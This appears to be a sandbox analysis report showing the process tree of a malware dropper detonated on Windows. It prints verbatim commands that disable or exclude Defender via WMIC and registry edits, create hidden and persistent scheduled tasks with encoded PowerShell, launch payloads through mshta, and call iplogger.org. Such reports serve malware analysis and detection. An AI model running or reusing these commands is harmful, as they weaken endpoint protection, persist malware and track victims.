C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session2⤵
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffeebb74f50,0x7ffeebb74f60,0x7ffeebb74f703⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1884 /prefetch:23⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1932 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1944 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2588 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4924 /prefetch:83⤵
- Checks BIOS information in registry
- Checks for any installed AV software in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5044 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1008 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5300 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5212 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2996 /prefetch:23⤵
-
C:\Users\Admin\AppData\Roaming\wcbafrfC:\Users\Admin\AppData\Roaming\wcbafrf2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\babafrfC:\Users\Admin\AppData\Roaming\babafrf2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS471324A2\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\5cyMyMfaTHF5mm4GGWje7aCw.exe"C:\Users\Admin\Documents\5cyMyMfaTHF5mm4GGWje7aCw.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\DVqoN_M2hyOJuqKLhZl3Zhf2.exe"C:\Users\Admin\Documents\DVqoN_M2hyOJuqKLhZl3Zhf2.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im DVqoN_M2hyOJuqKLhZl3Zhf2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\DVqoN_M2hyOJuqKLhZl3Zhf2.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im DVqoN_M2hyOJuqKLhZl3Zhf2.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\QSydSxCGLaGDRZ1oU1LJVgeo.exe"C:\Users\Admin\Documents\QSydSxCGLaGDRZ1oU1LJVgeo.exe"6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\msSZ2vyO5kijQfy3iLE0ayRx.exe"C:\Users\Admin\Documents\msSZ2vyO5kijQfy3iLE0ayRx.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe"C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScrIPt:CLoSe (cREATEobjEcT("WscRIpt.SHEll"). RUn ( "cMD.exe /q /c CoPY /Y ""C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe"" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If """" =="""" for %R IN ( ""C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe"" ) do taskkill -im ""%~nXR"" /f" ,0 , TRUE))7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c CoPY /Y "C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh &If "" =="" for %R IN ( "C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe" ) do taskkill -im "%~nXR" /f8⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXEY1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScrIPt:CLoSe (cREATEobjEcT("WscRIpt.SHEll"). RUn ( "cMD.exe /q /c CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE"" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If ""/pPcO7dQJSv4ebP1WI9YNCeWEF27pAh "" =="""" for %R IN ( ""C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE"" ) do taskkill -im ""%~nXR"" /f" ,0 , TRUE))10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c CoPY /Y "C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh &If "/pPcO7dQJSv4ebP1WI9YNCeWEF27pAh " =="" for %R IN ( "C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE" ) do taskkill -im "%~nXR" /f11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" Z~DYVRL.v,IzgdZv10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "AshFb0VOpmlvVISw0CGgF3Vv.exe" /f9⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\l6unBCJnlLRYEZSAupPv3hRP.exe"C:\Users\Admin\Documents\l6unBCJnlLRYEZSAupPv3hRP.exe"6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "210921.exe" & start "" "Done.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"7⤵
-
C:\Users\Admin\AppData\Local\Temp\210921.exe"210921.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Users\Admin\AppData\Local\Temp\Done.exe"Done.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"8⤵
- Blocklisted process makes network request
-
C:\Users\Admin\Documents\nKgSrPTMItcaLsJo4r1XrMq6.exe"C:\Users\Admin\Documents\nKgSrPTMItcaLsJo4r1XrMq6.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSDDED.tmp\Install.exe.\Install.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS98.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZokipixH" /SC once /ST 00:41:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZokipixH"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gZokipixH"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bOoGaaDxESFbryPOAb" /SC once /ST 10:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\eCiNxbZ.exe\" tt /site_id 394347 /S" /V1 /F9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\i_mtShrQKXhCFkurByO6l9wD.exe"C:\Users\Admin\Documents\i_mtShrQKXhCFkurByO6l9wD.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\YZb540BezbbpKeaGGc138FrF.exe"C:\Users\Admin\Documents\YZb540BezbbpKeaGGc138FrF.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\DyzW75Vg9OFYpumqyTL2gvjP.exe"C:\Users\Admin\Documents\DyzW75Vg9OFYpumqyTL2gvjP.exe"6⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\DyzW75Vg9OFYpumqyTL2gvjP.exe"C:\Users\Admin\Documents\DyzW75Vg9OFYpumqyTL2gvjP.exe"7⤵
-
C:\Users\Admin\Documents\g4sLH6CA5afgxnFDnbN6julV.exe"C:\Users\Admin\Documents\g4sLH6CA5afgxnFDnbN6julV.exe"6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
-
C:\Users\Admin\Documents\jRMIx4HYZwNMhmRfA3bxVT31.exe"C:\Users\Admin\Documents\jRMIx4HYZwNMhmRfA3bxVT31.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
